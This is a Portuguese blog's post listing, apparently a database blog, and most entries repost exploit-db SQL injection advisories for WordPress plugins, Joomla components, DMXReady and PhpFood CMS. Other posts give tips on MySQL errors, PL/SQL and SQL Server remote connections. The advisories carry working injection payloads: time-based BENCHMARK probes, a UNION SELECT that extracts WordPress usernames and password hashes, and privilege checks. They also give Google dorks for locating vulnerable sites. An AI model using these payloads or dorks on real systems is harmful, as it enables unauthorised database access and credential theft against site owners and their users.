MySQL server has gone away

27/08/2012 0 Comments

Seu mysql anda estranho quando você está tentando fazer upload de um arquivo enorme via console (na verdade o restore, ou seja, mysql -u usuario -p nomedobdprarestaurar < arquivo.sql)??? Bem, se a mensagem de erro for esta -> MySQL server has gone away NÃO precisa entrar em pânico, só existem 2 coisas que são feitas e …

WordPress jetpack plugin SQL Injection Vulnerability

21/11/2011 0 Comments

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 …

WordPress PureHTML plugin

06/09/2011 0 Comments

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !wp_verify_nonce( $_POST[‘PureHTMLNOnce’], …

WordPress yolink Search plugin

06/09/2011 0 Comments

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …

WordPress Event Registration plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …

WordPress Contus HD FLV Player plugin

18/08/2011 0 Comments

# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1 ————— Vulnerable code ————— $pid1 = $_GET[‘playid’]; foreach ($_GET[‘listItem’] as $position => $item) : mysql_query(“UPDATE $wpdb->prefix” . …

WordPress File Groups plugin

18/08/2011 0 Comments

# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col(“select guid from wp_posts where post_parent = $fgid”); http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin

08/08/2011 0 Comments

# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

04/07/2011 0 Comments

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_documentlibrarymanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=document-library-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. —————————————————————————————————- Bug; http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ …

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

04/07/2011 0 Comments

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_billboardmanager_summary_popup.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=account-list-manager # Version: v1.2 #Language: ASP # Price : $99.97 #Demo : http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. ————————————————————————————————— …

PhpFood CMS v2.00 SQL Injection Vulnerability

04/07/2011 0 Comments

############################################################################################################# ## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 3 July, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.phpfood.com/ [+] Download : http://www.phpfood.com/download.html [+] version : 2.00 or lower maybe also affected [+] Vulnerability …

O que é PL/SQL?

04/07/2011 0 Comments

PL/SQL (acrónimo para a expressão inglesa Procedural Language/Structured Query Language) é uma extensão da linguagem padrão SQL para o SGBD Oracle da Oracle Corporation. É uma Linguagem Procedural da Oracle, estendida da SQL. Permite que a manipulação de dados seja incluída em unidades de programas. Blocos de PL/SQL são passados e processados por uma PL/SQL …

Joomla Component (com_team) SQL Injection Vulnerability

21/06/2011 0 Comments

******************************************************************************** Joomla Component (com_team) SQL Injection Vulnerability ******************************************************************************** Author : CoBRa_21 Dork : inurl:com_team ******************************************************************************** Exploit http://localhost/[PATH]/print.php?task=person&id=36 and 1=1 http://localhost/[PATH]/print.php?task=person&id=36 and 1=2 http://localhost/[PATH]/print.php?task=person&id=36 [SQL] ******************************************************************************** Ordu-yu Lojistik TIM // CoBRa_21 ******************************************************************************** Fonte: http://www.exploit-db.com/exploits/17412/

WordPress Events Manager Extended Plugin SQL Injection Vulnerability

13/06/2011 0 Comments

———————————————————————— # WordPress Events Manager Extended Plugin Persistent SQL Vulnerability ———————————————————————— # SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/ # Version     : 3.1.2 # Author      : LoocK3D # Date        : 11 June , 2011 ———————————————————————— [-] Dork            ; inurl:wp-admin/admin.php?page= [-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL] [-] Exploit         ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+wp_users– ———————————————————————— # UAHCrew Member : Hackeri-AL – LoocK3D – b4cKd00r ~ # …

Joomla Component com_joomnik SQL Injection Vulnerability

30/05/2011 0 Comments

  <——————- header data start ——————- > ############################################################# Joomla Component Joomnik Gallery SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 26.05.2011 # Greetz : DreamPower – CWKOMANDO – Toprak – Equ – Err0r – 10line # Name : Joomla com_joomnik # Bug Type : SQL injection # Infection : …

Como habilitar conexões remotas com o mssql server 2005 (express ou standard/enterprise)

02/12/2009 0 Comments

Como configurar Conexão Remota no SQL Server 2005 Muitos casos de problemas com conexão ao servidor de Banco de Dados ocorrem por uma limitação que o SQL Server 2005 possui por padrão. Esta configuração de segurança que vem padronizada no SQL pode ser alterada facilmente. Neste artigo, será apresentada uma maneira de como solucionar este …

Como configurar Conexão Remota no SQL Server 2005

14/03/2009 0 Comments

Fonte: http://www.linhadecodigo.com.br/Artigo.aspx?id=1260 Dono: http://www.linhadecodigo.com.br/Colaborador.aspx?id=286